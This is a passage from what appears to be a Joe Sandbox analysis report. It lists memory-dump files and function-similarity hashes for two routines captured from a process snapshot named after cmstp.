                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: cfdd61a4e5432f48a130749a65dea49f68c977a7f8904643c89f0ed03c1b110c
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 3191A232D00256EADF24CF98C8457EEBBB4FF85714F24906EDA11A7292E7315A41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: $$0
                                          • API String ID: 1302938615-389342756
                                          • Opcode ID: b79ed6d8a28a8b32456fff1413df9c2559110664ca5c55e3a7439fdc3e957b7e
                                          • Instruction ID: 65402b69525bb7ba15db55015201cbe2bab2a0e86a5fe85e93732de368117ea1
                                          • Opcode Fuzzy Hash: b79ed6d8a28a8b32456fff1413df9c2559110664ca5c55e3a7439fdc3e957b7e
                                          • Instruction Fuzzy Hash: DF91A070D0828ADEDF25CFADC8543EDBFB1AF01310F148A5BD8A1A72A1C7764A42CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%